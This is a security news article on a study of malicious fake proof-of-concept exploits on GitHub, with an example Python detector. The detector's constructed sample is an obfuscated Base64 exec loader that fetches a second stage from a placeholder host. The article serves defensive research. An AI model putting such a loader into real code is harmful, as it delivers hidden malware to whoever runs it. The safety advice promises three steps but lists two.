
Thousands of GitHub Repositories Deliver Fake PoC Exploits with Malware

Researchers at the Leiden Institute of Advanced Computer Science have discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of which contain malware.

GitHub is one of the largest code-hosting platforms, and researchers use it to publish PoC exploits so that the security community can review fixes for vulnerabilities and assess the impact and scope of bugs.

According to the technical paper by the Leiden Institute of Advanced Computer Science researchers, the odds of receiving malware instead of a working PoC are up to 10.3%, excluding proven fakes and pranks.

Data Collection and Analysis

The researchers analyzed over 47,300 repositories offering exploits for disclosed vulnerabilities between 2017 and 2021 using three mechanisms:

  • IP address analysis: comparing the IP addresses found in the PoC against public blocklists, VirusTotal and AbuseIPDB.
  • Binary analysis: running VirusTotal checks on the provided executables and their hashes.
  • Hexadecimal and Base64 analysis: decoding obfuscated files before performing the binary and IP checks.
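The three checks above in simplified form, as an added example that is not the Leiden team's code: IPs are extracted from the raw text, Base64 and `\x`-hex blobs are decoded and re-scanned recursively, and every decoded payload is hashed so it can be matched against a blocklist. The sample PoC, the address 203.0.113.7 and both blocklists are constructed here to stand in for VirusTotal/AbuseIPDB lookups.

```python
import base64
import hashlib
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
HEX_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}")


def decode_layers(text, depth=3):
    """Yield `text` and every Base64 / \\x-hex blob inside it, recursively,
    so the IP and hash checks also see what an obfuscated loader would run."""
    yield text
    if depth == 0:
        return
    for m in B64_RE.finditer(text):
        try:
            inner = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # not real Base64 (binascii.Error is a ValueError)
            continue
        yield from decode_layers(inner.decode("utf-8", "ignore"), depth - 1)
    for m in HEX_RE.finditer(text):
        inner = bytes.fromhex(m.group(0).replace("\\x", ""))
        yield from decode_layers(inner.decode("utf-8", "ignore"), depth - 1)


def analyze(text, ip_blocklist, hash_blocklist):
    """Return IPs and payload hashes seen across all decoded layers and
    which of them hit the locally supplied blocklists."""
    layers = list(decode_layers(text))
    ips = {ip for layer in layers for ip in IPV4_RE.findall(layer)}
    # Hash only the decoded payloads (layers[0] is the repository file itself).
    hashes = {hashlib.sha256(layer.encode()).hexdigest() for layer in layers[1:]}
    return {"layers": len(layers), "ips": ips,
            "bad_ips": ips & ip_blocklist, "bad_hashes": hashes & hash_blocklist}


# Constructed sample mimicking the BlueKeep case: the "PoC" only fetches a
# second stage from a hard-coded host (203.0.113.7 is a documentation address).
STAGE = 'import urllib.request\nurllib.request.urlopen("http://203.0.113.7/stage.vbs")\n'
FAKE_POC = ("#!/usr/bin/env python3\n# PoC for CVE-2019-0708\nimport base64\n"
            'exec(base64.b64decode("%s"))\n' % base64.b64encode(STAGE.encode()).decode())
# Constructed blocklists standing in for VirusTotal / AbuseIPDB results.
IP_BLOCKLIST = {"203.0.113.7"}
HASH_BLOCKLIST = {hashlib.sha256(STAGE.encode()).hexdigest()}

if __name__ == "__main__":
    print(analyze(FAKE_POC, IP_BLOCKLIST, HASH_BLOCKLIST))
```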

Of the 150,734 unique IPs extracted, 2,864 matched blocklist entries, 1,522 were detected as malicious by VirusTotal scans, and 1,069 of those were present in the AbuseIPDB database.

Binary analysis examined a set of 6,160 executables, revealing a total of 2,164 malicious samples hosted in 1,398 repositories. In total, 4,893 of the 47,313 repositories tested were classified as malicious, most of them concerning vulnerabilities from 2020. The researchers also shared with BleepingComputer at least 60 other samples that are still live and are in the process of being removed from GitHub.

PoC Malware

Upon closer inspection of some of these cases, the researchers found a variety of malware and malicious scripts, ranging from remote access trojans to Cobalt Strike.

An interesting case is a PoC for CVE-2019-0708 (aka “BlueKeep”). It contains a Base64-obfuscated Python script that retrieves a VBScript from Pastebin.

That script is the Houdini RAT, a well-known JavaScript-based trojan that supports remote command execution via the Windows command line (CMD).

In another case, the researchers discovered a fake PoC that was actually an information stealer collecting system information, the IP address, and the user agent.

This one had previously been created by another researcher as a security experiment, so finding it with an automated tool confirmed to the researchers that their approach worked.

One of the researchers, security researcher El Yadmani Soufian, provided other examples that are not included in the technical report:

  • A Python PoC with a one-liner to decode a Base64-encoded payload that VirusTotal flags as malicious.
  • A fake BlueKeep exploit containing an executable flagged as malicious by most antivirus engines and identified as Cobalt Strike.
  • A script hidden in a fake PoC with a currently inactive malicious component that can do harm if the author chooses to activate it.

How to stay safe

Blindly trusting GitHub repositories from unverified sources is a bad idea. The content is unmoderated, so it’s up to you to review it before using it.

Software testers are advised to review the downloaded PoC carefully and run as many tests as possible before executing.

Soufian believes that all testers should follow these three steps.

  1. If the code is too obfuscated and would take too long to analyze manually, run it in a sandbox environment (such as an isolated virtual machine) and monitor the network for suspicious traffic.
  2. Analyze the binary using an open source intelligence tool such as VirusTotal.

The researchers reported all malicious repositories they found to GitHub, but many are still public because it takes time to review and remove them all.

As Soufian explained, the research is intended not only as a one-time cleanup action on GitHub but also as a trigger for the development of a tailored, automated solution that can flag malicious instructions in uploaded code.

This is the first version of the team’s research, and they are working on improving the detector, which currently misses code with stronger obfuscation.
